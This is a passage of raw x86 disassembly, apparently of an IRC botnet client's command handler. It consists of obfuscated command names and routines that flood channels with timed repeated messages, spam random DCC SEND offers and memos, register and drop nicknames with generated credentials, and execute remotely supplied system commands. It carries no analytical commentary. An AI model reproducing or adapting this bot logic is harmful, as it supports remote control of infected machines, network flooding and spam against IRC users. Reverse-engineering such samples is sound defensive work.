; ---------------------------------------------------------------------------
loc_40E02A: ; CODE XREF: sub_40A938+36C4�j
push ecx
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
add esp, 10h
loc_40E044: ; CODE XREF: sub_40A938+36E1�j
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
pop ecx
loc_40E051: ; CODE XREF: sub_40A938+36B6�j
; sub_40A938+36BD�j
push dword ptr [ebx+4]
push offset aQrn4z10ge1i1_0 ; "QRn4z10ge1I1"
call edi ; dword_437174
test eax, eax
jnz short loc_40E08C
mov eax, [ebx+8]
test eax, eax
jz short loc_40E08C
push eax
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
loc_40E08C: ; CODE XREF: sub_40A938+3725�j
; sub_40A938+372C�j
push dword ptr [ebx+4]
push offset aIegud0v_5_ ; "iEguD0V/.5/."
call edi ; dword_437174
test eax, eax
jnz short loc_40E0CF
mov ecx, [ebx+8]
test ecx, ecx
jz short loc_40E0CF
mov eax, [ebx+0Ch]
test eax, eax
jz short loc_40E0CF
push eax
push ecx
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
lea eax, [ebp+var_59BC]
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40E0CF: ; CODE XREF: sub_40A938+3760�j
; sub_40A938+3767�j ...
push dword ptr [ebx+4]
push offset aFc9kk1jx11g_ ; "fc9Kk1jX11G."
call edi ; dword_437174
test eax, eax
jnz short loc_40E13C
cmp [ebx+8], eax
jz short loc_40E13C
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
call sub_429ACC
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_1F54]
push edx
push dword ptr [ebx+8]
push offset dword_441028
push eax
call sub_429A33
lea eax, [ebp+var_1F54]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 28h
loc_40E13C: ; CODE XREF: sub_40A938+37A3�j
; sub_40A938+37A8�j
push dword ptr [ebx+4]
push offset aDnjq8Ze3zw ; "DnjQ8/ze3ZW/"
call edi ; dword_437174
test eax, eax
jnz loc_40E290
mov eax, [ebx+8]
test eax, eax
jz loc_40E290
cmp dword ptr [ebx+0Ch], 0
jz loc_40E290
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 2Ch
call sub_429ACC
cdq
mov ecx, 3E8h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
call sub_429ACC
cdq
mov ecx, 384h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 2Ch
call sub_429ACC
cdq
mov ecx, 0C8h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40E290: ; CODE XREF: sub_40A938+3810�j
; sub_40A938+381B�j ...
push dword ptr [ebx+4]
push offset aEwqxaOc1t_ ; "EWqxA//oC1T."
call edi ; dword_437174
test eax, eax
jnz loc_40E66B
cmp [ebx+8], eax
jz loc_40E66B
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
call sub_429ACC
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 41h
mov byte ptr [ebp+arg_68+3], dl
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
movsx eax, byte ptr [ebp+arg_68+3]
push edx
push eax
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_220C0]
push edx
push offset dword_440F80
push eax
call sub_429A33
push 7D0h
push 400h
call sub_41E34F
add esp, 0C4h
push eax
lea eax, [ebp+var_38050]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440F44
push eax
call sub_429A33
push 7D0h
push 400h
call sub_41E34F
add esp, 1Ch
push eax
call sub_429ACC
cdq
mov ecx, 5F5E0FFh
idiv ecx
lea eax, [ebp+var_3CE70]
push edx
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440EF8
push eax
call sub_429A33
push 7D0h
push 400h
call sub_41E34F
add esp, 20h
push eax
call sub_429ACC
cdq
mov ecx, 5F5E0FFh
idiv ecx
push edx
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
lea eax, [ebp+var_41C90]
push offset dword_440EC8
push eax
call sub_429A33
push 7D0h
push 400h
call sub_41E34F
push eax
lea eax, [ebp+var_220C0]
push eax
lea eax, [ebp+var_46AB0]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440EA4
push eax
call sub_429A33
add esp, 38h
call sub_42625A
push eax
lea eax, [ebp+var_220C0]
push eax
call sub_42625A
push eax
lea eax, [ebp+var_4B8D0]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset dword_440E8C
push eax
call sub_429A33
lea eax, [ebp+var_220C0]
push eax
lea eax, [ebp+var_506F0]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSDccSendCS ; "%s %s :DCC SEND C:\\\\\\\\%s"
push eax
call sub_429A33
lea eax, [ebp+var_38050]
push eax
call sub_4262C5
lea eax, [ebp+var_3CE70]
push eax
call sub_4262C5
lea eax, [ebp+var_41C90]
push eax
call sub_4262C5
lea eax, [ebp+var_46AB0]
push eax
call sub_4262C5
add esp, 40h
lea eax, [ebp+var_4B8D0]
push eax
call sub_4262C5
lea eax, [ebp+var_506F0]
push eax
call sub_4262C5
pop ecx
pop ecx
loc_40E66B: ; CODE XREF: sub_40A938+3964�j
; sub_40A938+396D�j
push dword ptr [ebx+4]
push offset aJiatz0xsump1 ; "JIAtz0xSuMp1"
call edi ; dword_437174
test eax, eax
jnz loc_40E768
cmp [ebx+8], eax
jz loc_40E768
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
push 0Fh
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
pop ecx
lea edi, [ebp+var_768]
rep movsd
movsw
movsb
mov esi, 2710h
lea eax, [ebp+var_66680]
push esi
push 0
push eax
call sub_429690
push esi
lea eax, [ebp+var_35940]
push 0
push eax
call sub_429690
add esp, 1Ch
mov esi, 8Fh
loc_40E6D0: ; CODE XREF: sub_40A938+3DE6�j
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
call sub_429ACC
push 24h
cdq
pop ecx
idiv ecx
movsx eax, [ebp+edx+var_768]
push eax
push offset dword_440E6C
lea eax, [ebp+var_66680]
push 2710h
push eax
call sub_429AEE
add esp, 14h
lea eax, [ebp+var_66680]
push eax
lea eax, [ebp+var_35940]
push eax
call dword_437090 ; lstrcatA
dec esi
jnz short loc_40E6D0
push 7D0h
push 400h
call sub_41E34F
push eax
lea eax, [ebp+var_35940]
push eax
lea eax, [ebp+var_55510]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440E44
push eax
call sub_429A33
lea eax, [ebp+var_55510]
push eax
call sub_4262C5
mov esi, [ebp+arg_C]
mov edi, dword_437174
add esp, 24h
loc_40E768: ; CODE XREF: sub_40A938+3D3F�j
; sub_40A938+3D48�j
push dword ptr [ebx+4]
push offset aVi0qa1mvfro1 ; "VI0QA1mvfro1"
call edi ; dword_437174
test eax, eax
jnz loc_40E854
cmp [ebx+8], eax
jz loc_40E854
cmp [ebx+0Ch], eax
jz loc_40E854
push 2710h
push eax
lea eax, [ebp+var_52E00]
push eax
call sub_429690
push 104h
lea eax, [ebp+var_2EA8]
push 0
push eax
call sub_429690
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_2EA8]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 24h
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_40E815
loc_40E7D3: ; CODE XREF: sub_40A938+3EDB�j
mov eax, [ebp+arg_C]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40E80A
push eax
lea eax, [ebp+var_52E00]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_52E00]
push 104h
push eax
lea eax, [ebp+var_2EA8]
push eax
call sub_429910
add esp, 18h
loc_40E80A: ; CODE XREF: sub_40A938+3EA3�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40E7D3
loc_40E815: ; CODE XREF: sub_40A938+3E99�j
push 7D0h
push 400h
call sub_41E34F
push eax
lea eax, [ebp+var_2EA8]
push eax
lea eax, [ebp+var_5A330]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440E44
push eax
call sub_429A33
lea eax, [ebp+var_5A330]
push eax
call sub_4262C5
add esp, 24h
loc_40E854: ; CODE XREF: sub_40A938+3E3C�j
; sub_40A938+3E45�j ...
push dword ptr [ebx+4]
push offset aW3gp6_13acy1 ; "W3GP6.13AcY1"
call edi ; dword_437174
test eax, eax
jnz short loc_40E89A
lea eax, [ebp+var_21F8]
push eax
call sub_426698
lea eax, [ebp+var_21F8]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40E89A: ; CODE XREF: sub_40A938+3F28�j
push dword ptr [ebx+4]
push offset aE8qiq0hukv9 ; "e8qiq0Hukv9/"
call edi ; dword_437174
test eax, eax
jnz short loc_40E90A
mov eax, [ebx+8]
test eax, eax
jz short loc_40E90A
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
lea eax, [ebp+var_2268]
push eax
call sub_426698
lea eax, [ebp+var_2268]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 2Ch
loc_40E90A: ; CODE XREF: sub_40A938+3F6E�j
; sub_40A938+3F75�j
push dword ptr [ebx+4]
push offset a18rjk_sa2je ; "18Rjk.sa2JE/"
call edi ; dword_437174
test eax, eax
jnz loc_40E9DA
cmp [ebx+8], eax
jz loc_40E9DA
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40E9DA
and [ebp+arg_C], 0
push eax
call sub_42A030
test eax, eax
pop ecx
jle loc_40E9DA
loc_40E943: ; CODE XREF: sub_40A938+409C�j
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
lea eax, [ebp+var_1F8C]
push eax
call sub_426698
lea eax, [ebp+var_1F8C]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 40h
inc [ebp+arg_C]
push dword ptr [ebx+0Ch]
call sub_42A030
cmp [ebp+arg_C], eax
pop ecx
jl loc_40E943
loc_40E9DA: ; CODE XREF: sub_40A938+3FDE�j
; sub_40A938+3FE7�j ...
push dword ptr [ebx+4]
push offset aLjAmKzrtp1 ; "lJ/am/kZRtP1"
call edi ; dword_437174
test eax, eax
jnz loc_40EACD
mov eax, [ebx+8]
test eax, eax
jz loc_40EACD
cmp dword ptr [ebx+0Ch], 0
jz loc_40EACD
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 2Ch
call sub_429ACC
cdq
mov ecx, 3E8h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
call sub_429ACC
cdq
mov ecx, 384h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40EACD: ; CODE XREF: sub_40A938+40AE�j
; sub_40A938+40B9�j ...
push dword ptr [ebx+4]
push offset aXzaru0amxhi_ ; "XZArU0aMxhi."
call edi ; dword_437174
test eax, eax
jnz loc_40EBB6
mov eax, [ebx+8]
test eax, eax
jz loc_40EBB6
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 2Ch
call sub_429ACC
cdq
mov ecx, 3E8h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
call sub_429ACC
cdq
mov ecx, 384h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40EBB6: ; CODE XREF: sub_40A938+41A1�j
; sub_40A938+41AC�j
push dword ptr [ebx+4]
push offset aRa7e2Hhxpf0 ; "rA7E2/hHXPf0"
call edi ; dword_437174
test eax, eax
jnz loc_40ECD2
mov eax, [ebx+8]
test eax, eax
jz loc_40ECD2
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441070
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 28h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_44105C
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_44104C
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_44104C
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
loc_40ECD2: ; CODE XREF: sub_40A938+428A�j
; sub_40A938+4295�j
push dword ptr [ebx+4]
push offset aRp4sr11cvr1 ; "Rp4sR11CvR1/"
call edi ; dword_437174
test eax, eax
jnz loc_40EE01
mov eax, [ebx+8]
test eax, eax
jz loc_40EE01
cmp dword ptr [ebx+0Ch], 0
jz loc_40EE01
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441070
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 28h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40EE01: ; CODE XREF: sub_40A938+43A6�j
; sub_40A938+43B1�j ...
push dword ptr [ebx+4]
push offset aZqrvt0t6nmz_ ; "ZqrVt0t6nmZ."
call edi ; dword_437174
test eax, eax
jnz loc_40EEAF
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40EEAF
push eax
lea eax, [ebp+var_32AC]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_40EE80
loc_40EE3E: ; CODE XREF: sub_40A938+4546�j
mov eax, [ebp+arg_C]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40EE75
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_32AC]
push eax
call sub_429910
add esp, 18h
loc_40EE75: ; CODE XREF: sub_40A938+450E�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40EE3E
loc_40EE80: ; CODE XREF: sub_40A938+4504�j
lea eax, [ebp+var_32AC]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSMemoservSendS ; "%s memoserv :send %s %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40EEAF: ; CODE XREF: sub_40A938+44D5�j
; sub_40A938+44E0�j
push dword ptr [ebx+4]
push offset a1shta0bzfwk1 ; "1ShtA0bzFwk1"
call edi ; dword_437174
test eax, eax
jnz short loc_40EF13
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
call sub_401A77
push eax
call sub_401A77
push eax
lea eax, [ebp+var_5F150]
push offset aS@S_com ; "%s@%s.com"
push eax
call sub_429A33
lea eax, [ebp+var_5F150]
push eax
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
lea eax, [ebp+var_59BC]
push offset aSNickservRegis ; "%s nickserv :register pass103 %s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 24h
loc_40EF13: ; CODE XREF: sub_40A938+4583�j
push dword ptr [ebx+4]
push offset aAzcsp_hkilo_ ; "AZcsP.hkiLO."
call edi ; dword_437174
test eax, eax
jnz short loc_40EF46
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
lea eax, [ebp+var_59BC]
push offset aSNickservDrop ; "%s nickserv drop"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 10h
loc_40EF46: ; CODE XREF: sub_40A938+45E7�j
push dword ptr [ebx+4]
push offset aErwc30qfw_p0 ; "eRWc30Qfw.P0"
call edi ; dword_437174
test eax, eax
jnz loc_4148CF
call sub_426AA3
xor ebx, ebx
mov edi, offset aSUnloaded_ ; "%s Unloaded."
cmp [ebp+arg_14], ebx
jnz short loc_40EF82
cmp [ebp+arg_18], ebx
jnz short loc_40EF8B
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_40EF82: ; CODE XREF: sub_40A938+462F�j
cmp [ebp+arg_18], ebx
jz loc_4148CF
loc_40EF8B: ; CODE XREF: sub_40A938+4634�j
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
jmp loc_41467D
; ---------------------------------------------------------------------------
loc_40EF95: ; CODE XREF: sub_40A938+2A19�j
push dword ptr [ebx]
push offset aFepmfZswfd ; "FEpMF/ZswFD/"
call edi ; dword_437174
test eax, eax
jnz loc_40F03B
cmp [ebx+4], eax
jnz short loc_40EFB5
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jmp loc_40F7DA
; ---------------------------------------------------------------------------
loc_40EFB5: ; CODE XREF: sub_40A938+4671�j
push 20h
push [ebp+arg_8]
call sub_42B0D0
mov edi, eax
xor ebx, ebx
pop ecx
cmp edi, ebx
pop ecx
jz loc_4148CF
cmp [ebp+arg_34], ebx
jz short loc_40F003
mov al, [ebp+arg_38]
mov byte ptr [ebp+arg_C+3], 5Fh
test al, al
jz short loc_40EFE0
mov byte ptr [ebp+arg_C+3], al
loc_40EFE0: ; CODE XREF: sub_40A938+46A3�j
push edi
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_40F003
loc_40EFEB: ; CODE XREF: sub_40A938+46C9�j
mov al, byte ptr [ebp+arg_C+3]
cmp [ebx+edi], al
jnz short loc_40EFF7
mov byte ptr [ebx+edi], 20h
loc_40EFF7: ; CODE XREF: sub_40A938+46B9�j
push edi
inc ebx
call sub_4292D0
cmp ebx, eax
pop ecx
jb short loc_40EFEB
loc_40F003: ; CODE XREF: sub_40A938+4698�j
; sub_40A938+46B1�j
inc edi
push edi
call sub_42B019
test eax, eax
pop ecx
jz short loc_40F02B
cmp [ebp+arg_18], 0
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSystemcallFai ; "%s SystemCall failed."
jnz loc_41467E
loc_40F023: ; CODE XREF: sub_40A938+C33�j
push dword ptr [esi+0Ch]
jmp loc_40AE8B
; ---------------------------------------------------------------------------
loc_40F02B: ; CODE XREF: sub_40A938+46D5�j
push edi
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSystemcallSen ; "%s SystemCall sent: \"%s\""
jmp loc_40D132
; ---------------------------------------------------------------------------
loc_40F03B: ; CODE XREF: sub_40A938+4668�j
push dword ptr [ebx]
push offset aSud8hRsu8j1 ; "sUd8h/rsu8j1"
call edi ; dword_437174
test eax, eax
jnz loc_40F128
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_18]
mov [ebp+var_27D4], eax
mov eax, [ebp+arg_10]
mov [ebp+var_27D8], ecx
